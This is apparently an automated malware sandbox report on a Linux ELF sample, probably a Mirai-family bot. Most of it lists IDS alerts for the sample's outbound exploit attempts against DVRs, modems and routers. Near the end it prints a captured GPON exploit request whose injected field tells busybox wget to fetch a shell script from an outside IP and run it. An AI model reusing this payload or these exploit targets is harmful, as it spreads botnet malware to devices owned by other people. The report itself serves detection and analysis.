Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 89.161.235.40

Timestamp:	192.168.2.2389.161.235.4049618802030092 11/24/23-11:27:59.242653
SID:	2030092
Source Port:	49618
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 20.65.65.132

Timestamp:	192.168.2.2320.65.65.13240278802025883 11/24/23-11:27:54.607011
SID:	2025883
Source Port:	40278
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT D-Link DSL-2750B - OS Command Injection - Source IP: 192.168.2.23 - Destination IP: 212.227.213.16

Timestamp:	192.168.2.23212.227.213.1642610802025756 11/24/23-11:27:54.702570
SID:	2025756
Source Port:	42610
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted User Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 194.105.129.214

Timestamp:	192.168.2.23194.105.129.21435414802030092 11/24/23-11:27:54.690179
SID:	2030092
Source Port:	35414
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version) - Source IP: 192.168.2.23 - Destination IP: 212.132.247.49

Timestamp:	192.168.2.23212.132.247.4938936802835221 11/24/23-11:27:55.467937
SID:	2835221
Source Port:	38936
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.217.95.155

Timestamp:	192.168.2.2395.217.95.15551068802027121 11/24/23-11:27:55.334904
SID:	2027121
Source Port:	51068
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 108.159.231.25

Timestamp:	192.168.2.23108.159.231.2532966802025883 11/24/23-11:27:59.141301
SID:	2025883
Source Port:	32966
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 165.227.246.63

Timestamp:	192.168.2.23165.227.246.6349938802030092 11/24/23-11:27:54.692760
SID:	2030092
Source Port:	49938
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 58.109.58.169

Timestamp:	192.168.2.2358.109.58.1693398675472023548 11/24/23-11:27:58.745486
SID:	2023548
Source Port:	33986
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.221.165.79

Timestamp:	192.168.2.2388.221.165.7955240802027121 11/24/23-11:27:58.813932
SID:	2027121
Source Port:	55240
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 (metasploit version) - Source IP: 192.168.2.23 - Destination IP: 212.53.245.94

Timestamp:	192.168.2.23212.53.245.9435782802831299 11/24/23-11:27:58.974588
SID:	2831299
Source Port:	35782
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 170.130.83.21

Timestamp:	192.168.2.23170.130.83.2142486802030092 11/24/23-11:27:54.660821
SID:	2030092
Source Port:	42486
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 72.27.45.212

Timestamp:	192.168.2.2372.27.45.2124973475472023548 11/24/23-11:27:58.583702
SID:	2023548
Source Port:	49734
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version) - Source IP: 192.168.2.23 - Destination IP: 212.124.20.15

Timestamp:	192.168.2.23212.124.20.1551358802835221 11/24/23-11:27:55.118236
SID:	2835221
Source Port:	51358
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.240.218.234

Timestamp:	192.168.2.2395.240.218.23457274802027121 11/24/23-11:27:58.837361
SID:	2027121
Source Port:	57274
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 20.103.21.65

Timestamp:	192.168.2.2320.103.21.6555952802030092 11/24/23-11:27:54.681046
SID:	2030092
Source Port:	55952
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 47.151.5.35

Timestamp:	192.168.2.2347.151.5.354697675472023548 11/24/23-11:27:59.517643
SID:	2023548
Source Port:	46976
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 159.0.107.220

Timestamp:	192.168.2.23159.0.107.2203354275472023548 11/24/23-11:27:59.444287
SID:	2023548
Source Port:	33542
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 102.129.222.57

Timestamp:	192.168.2.23102.129.222.5760508802030092 11/24/23-11:27:56.582311
SID:	2030092
Source Port:	60508
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 47.93.253.139

Timestamp:	192.168.2.2347.93.253.13943928802030092 11/24/23-11:27:54.821531
SID:	2030092
Source Port:	43928
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 179.216.51.32

Timestamp:	192.168.2.23179.216.51.326097675472023548 11/24/23-11:27:58.063855
SID:	2023548
Source Port:	60976
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT D-Link DSL-2750B Command Injection Attempt (CVE-2016-20017) - Source IP: 192.168.2.23 - Destination IP: 54.201.44.163

Timestamp:	192.168.2.2354.201.44.16353632802049119 11/24/23-11:27:55.478081
SID:	2049119
Source Port:	53632
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 179.216.51.32

Timestamp:	192.168.2.23179.216.51.326095675472023548 11/24/23-11:27:57.803949
SID:	2023548
Source Port:	60956
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT D-Link DSL-2750B Command Injection Attempt (CVE-2016-20017) - Source IP: 192.168.2.23 - Destination IP: 212.127.181.223

Timestamp:	192.168.2.23212.127.181.22340306802049119 11/24/23-11:27:55.093583
SID:	2049119
Source Port:	40306
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 112.187.61.247

Timestamp:	192.168.2.23112.187.61.2475710675472023548 11/24/23-11:27:58.646534
SID:	2023548
Source Port:	57106
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 119.206.84.137

Timestamp:	192.168.2.23119.206.84.1374667075472023548 11/24/23-11:27:58.938593
SID:	2023548
Source Port:	46670
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.52.246.119

Timestamp:	192.168.2.2395.52.246.11942436802027121 11/24/23-11:27:55.413742
SID:	2027121
Source Port:	42436
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 179.213.29.227

Timestamp:	192.168.2.23179.213.29.2275503475472023548 11/24/23-11:27:59.248161
SID:	2023548
Source Port:	55034
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.0.22.141

Timestamp:	192.168.2.2395.0.22.14151178802027121 11/24/23-11:27:54.946943
SID:	2027121
Source Port:	51178
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 54.217.53.43

Timestamp:	192.168.2.2354.217.53.4334432802030092 11/24/23-11:27:56.617088
SID:	2030092
Source Port:	34432
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 20.65.65.132

Timestamp:	192.168.2.2320.65.65.13240278802030092 11/24/23-11:27:54.607011
SID:	2030092
Source Port:	40278
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 45.60.138.179

Timestamp:	192.168.2.2345.60.138.17954426802025883 11/24/23-11:27:54.606824
SID:	2025883
Source Port:	54426
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 23.201.179.21

Timestamp:	192.168.2.2323.201.179.2159182802030092 11/24/23-11:27:59.450940
SID:	2030092
Source Port:	59182
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 104.255.108.168

Timestamp:	192.168.2.23104.255.108.1685708675472023548 11/24/23-11:27:59.219494
SID:	2023548
Source Port:	57086
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 75.162.7.41

Timestamp:	192.168.2.2375.162.7.415010475472023548 11/24/23-11:27:58.280668
SID:	2023548
Source Port:	50104
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 89.161.235.40

Timestamp:	192.168.2.2389.161.235.4049618802025883 11/24/23-11:27:59.242653
SID:	2025883
Source Port:	49618
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 54.65.30.224

Timestamp:	192.168.2.2354.65.30.22441546802030092 11/24/23-11:27:59.297937
SID:	2030092
Source Port:	41546
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 159.0.107.220

Timestamp:	192.168.2.23159.0.107.2203358275472023548 11/24/23-11:27:59.714815
SID:	2023548
Source Port:	33582
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.216.153.6

Timestamp:	192.168.2.2395.216.153.634320802027121 11/24/23-11:27:55.361161
SID:	2027121
Source Port:	34320
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 98.98.156.131

Timestamp:	192.168.2.2398.98.156.1315170080802018132 11/24/23-11:27:56.975697
SID:	2018132
Source Port:	51700
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 41.108.209.129

Timestamp:	192.168.2.2341.108.209.1295404475472023548 11/24/23-11:27:59.400608
SID:	2023548
Source Port:	54044
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 104.255.108.168

Timestamp:	192.168.2.23104.255.108.1685711075472023548 11/24/23-11:27:59.347387
SID:	2023548
Source Port:	57110
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 194.78.4.14

Timestamp:	192.168.2.23194.78.4.1441832802025883 11/24/23-11:27:59.221852
SID:	2025883
Source Port:	41832
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT D-Link DSL-2750B Command Injection Attempt (CVE-2016-20017) - Source IP: 192.168.2.23 - Destination IP: 212.124.20.15

Timestamp:	192.168.2.23212.124.20.1551358802049119 11/24/23-11:27:55.118236
SID:	2049119
Source Port:	51358
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT D-Link DSL-2750B Command Injection Attempt (CVE-2016-20017) - Source IP: 192.168.2.23 - Destination IP: 212.108.134.33

Timestamp:	192.168.2.23212.108.134.3336696802049119 11/24/23-11:27:55.134353
SID:	2049119
Source Port:	36696
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 31.136.2.117

Timestamp:	192.168.2.2331.136.2.11756446528692027339 11/24/23-11:27:59.495893
SID:	2027339
Source Port:	56446
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.48.115

Timestamp:	192.168.2.23172.67.48.1155202680802018132 11/24/23-11:27:56.782476
SID:	2018132
Source Port:	52026
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 121.199.43.21

Timestamp:	192.168.2.23121.199.43.2152610802025883 11/24/23-11:27:56.427795
SID:	2025883
Source Port:	52610
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 185.182.193.206

Timestamp:	192.168.2.23185.182.193.20651862802025883 11/24/23-11:28:00.198605
SID:	2025883
Source Port:	51862
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 184.69.111.90

Timestamp:	192.168.2.23184.69.111.904554280802018132 11/24/23-11:27:57.543272
SID:	2018132
Source Port:	45542
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 112.187.61.247

Timestamp:	192.168.2.23112.187.61.2475713475472023548 11/24/23-11:27:58.957609
SID:	2023548
Source Port:	57134
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 141.71.21.73

Timestamp:	192.168.2.23141.71.21.7349408802030092 11/24/23-11:27:59.422254
SID:	2030092
Source Port:	49408
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 54.65.30.224

Timestamp:	192.168.2.2354.65.30.22441546802025883 11/24/23-11:27:59.297937
SID:	2025883
Source Port:	41546
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 20.103.21.65

Timestamp:	192.168.2.2320.103.21.6555952802025883 11/24/23-11:27:54.681046
SID:	2025883
Source Port:	55952
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.234.144.124

Timestamp:	192.168.2.2399.234.144.1244823475472023548 11/24/23-11:27:58.284275
SID:	2023548
Source Port:	48234
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT D-Link DSL-2750B - OS Command Injection - Source IP: 192.168.2.23 - Destination IP: 212.108.134.33

Timestamp:	192.168.2.23212.108.134.3336696802025756 11/24/23-11:27:55.134353
SID:	2025756
Source Port:	36696
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted User Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 24.102.64.146

Timestamp:	192.168.2.2324.102.64.1464750275472023548 11/24/23-11:27:59.310182
SID:	2023548
Source Port:	47502
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version) - Source IP: 192.168.2.23 - Destination IP: 54.201.44.163

Timestamp:	192.168.2.2354.201.44.16353632802835221 11/24/23-11:27:55.478081
SID:	2835221
Source Port:	53632
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 208.106.198.98

Timestamp:	192.168.2.23208.106.198.9838680802030092 11/24/23-11:27:54.660881
SID:	2030092
Source Port:	38680
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT D-Link DSL-2750B Command Injection Attempt (CVE-2016-20017) - Source IP: 192.168.2.23 - Destination IP: 212.132.247.49

Timestamp:	192.168.2.23212.132.247.4938936802049119 11/24/23-11:27:55.467937
SID:	2049119
Source Port:	38936
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.234.144.124

Timestamp:	192.168.2.2399.234.144.1244824475472023548 11/24/23-11:27:58.408049
SID:	2023548
Source Port:	48244
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 54.145.244.138

Timestamp:	192.168.2.2354.145.244.13847750802025883 11/24/23-11:28:00.114797
SID:	2025883
Source Port:	47750
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT D-Link DSL-2750B - OS Command Injection - Source IP: 192.168.2.23 - Destination IP: 23.33.143.7

Timestamp:	192.168.2.2323.33.143.736524802025756 11/24/23-11:27:54.702136
SID:	2025756
Source Port:	36524
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted User Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 185.84.224.152

Timestamp:	192.168.2.23185.84.224.15234676802025883 11/24/23-11:27:56.607524
SID:	2025883
Source Port:	34676
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version) - Source IP: 192.168.2.23 - Destination IP: 23.33.143.7

Timestamp:	192.168.2.2323.33.143.736524802835221 11/24/23-11:27:54.702136
SID:	2835221
Source Port:	36524
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 (metasploit version) - Source IP: 192.168.2.23 - Destination IP: 54.201.44.163

Timestamp:	192.168.2.2354.201.44.16353632802831299 11/24/23-11:27:55.478081
SID:	2831299
Source Port:	53632
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 (metasploit version) - Source IP: 192.168.2.23 - Destination IP: 212.227.213.16

Timestamp:	192.168.2.23212.227.213.1642610802831299 11/24/23-11:27:54.702570
SID:	2831299
Source Port:	42610
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 146.75.38.201

Timestamp:	192.168.2.23146.75.38.20151266802030092 11/24/23-11:27:56.521853
SID:	2030092
Source Port:	51266
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 108.159.231.25

Timestamp:	192.168.2.23108.159.231.2532966802030092 11/24/23-11:27:59.141301
SID:	2030092
Source Port:	32966
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 186.86.22.9

Timestamp:	192.168.2.23186.86.22.94902675472023548 11/24/23-11:27:59.525721
SID:	2023548
Source Port:	49026
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 157.230.225.110

Timestamp:	192.168.2.23157.230.225.11055580802030092 11/24/23-11:28:00.348311
SID:	2030092
Source Port:	55580
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 185.84.224.152

Timestamp:	192.168.2.23185.84.224.15234676802030092 11/24/23-11:27:56.607524
SID:	2030092
Source Port:	34676
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 211.107.31.17

Timestamp:	192.168.2.23211.107.31.174377475472023548 11/24/23-11:27:59.819525
SID:	2023548
Source Port:	43774
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 185.182.193.206

Timestamp:	192.168.2.23185.182.193.20651862802030092 11/24/23-11:28:00.198605
SID:	2030092
Source Port:	51862
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 23.76.63.175

Timestamp:	192.168.2.2323.76.63.17551512802030092 11/24/23-11:27:59.132433
SID:	2030092
Source Port:	51512
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.100.239.96

Timestamp:	192.168.2.2395.100.239.9660384802027121 11/24/23-11:27:54.906987
SID:	2027121
Source Port:	60384
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.66.155.22

Timestamp:	192.168.2.23172.66.155.223367280802018132 11/24/23-11:27:56.658483
SID:	2018132
Source Port:	33672
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.210.254

Timestamp:	192.168.2.23172.67.210.2543682280802018132 11/24/23-11:27:57.285221
SID:	2018132
Source Port:	36822
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 201.82.132.52

Timestamp:	192.168.2.23201.82.132.523932475472023548 11/24/23-11:27:58.113744
SID:	2023548
Source Port:	39324
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 39.62.208.129

Timestamp:	192.168.2.2339.62.208.1293820875472023548 11/24/23-11:27:58.159976
SID:	2023548
Source Port:	38208
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 75.162.7.41

Timestamp:	192.168.2.2375.162.7.415011075472023548 11/24/23-11:27:58.401527
SID:	2023548
Source Port:	50110
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version) - Source IP: 192.168.2.23 - Destination IP: 212.127.181.223

Timestamp:	192.168.2.23212.127.181.22340306802835221 11/24/23-11:27:55.093583
SID:	2835221
Source Port:	40306
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT D-Link DSL-2750B - OS Command Injection - Source IP: 192.168.2.23 - Destination IP: 194.65.120.166

Timestamp:	192.168.2.23194.65.120.16658954802025756 11/24/23-11:27:55.549758
SID:	2025756
Source Port:	58954
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted User Privilege Gain

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 52.114.254.48

Timestamp:	192.168.2.2352.114.254.4856148528692027339 11/24/23-11:27:59.305669
SID:	2027339
Source Port:	56148
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version) - Source IP: 192.168.2.23 - Destination IP: 194.65.120.166

Timestamp:	192.168.2.23194.65.120.16658954802835221 11/24/23-11:27:55.549758
SID:	2835221
Source Port:	58954
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.173.5.105

Timestamp:	192.168.2.2395.173.5.10542120802027121 11/24/23-11:27:59.537511
SID:	2027121
Source Port:	42120
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT D-Link DSL-2750B - OS Command Injection - Source IP: 192.168.2.23 - Destination IP: 212.53.245.94

Timestamp:	192.168.2.23212.53.245.9435782802025756 11/24/23-11:27:58.974588
SID:	2025756
Source Port:	35782
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted User Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.65.104.78

Timestamp:	192.168.2.23172.65.104.785633480802018132 11/24/23-11:27:56.782260
SID:	2018132
Source Port:	56334
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 38.181.43.71

Timestamp:	192.168.2.2338.181.43.7158452802030092 11/24/23-11:28:00.176349
SID:	2030092
Source Port:	58452
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 82.157.120.251

Timestamp:	192.168.2.2382.157.120.25146078802030092 11/24/23-11:28:00.364268
SID:	2030092
Source Port:	46078
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 (metasploit version) - Source IP: 192.168.2.23 - Destination IP: 212.132.247.49

Timestamp:	192.168.2.23212.132.247.4938936802831299 11/24/23-11:27:55.467937
SID:	2831299
Source Port:	38936
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

HTTP traffic detected: POST /GponForm/diag_Form?style/ HTTP/1.1User-Agent: Hello, WorldAccept: */*Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 31 34 2e 36 37 2e 32 31 37 2e 31 37 30 2f 73 6f 72 61 2e 73 68 2b 2d 4f 2b 76 61 69 63 61 6c 6f 6e 3b 63 68 6d 6f 64 2b 37 37 37 2b 2a 3b 73 68 2b 76 61 69 63 61 6c 6f 6e 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://114.67.217.170/sora.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0

Source: LOAD without section mappings

Program segment: 0x100000

Source: classification engine

Classification label: mal88.troj.evad.linELF@0/0@0/0

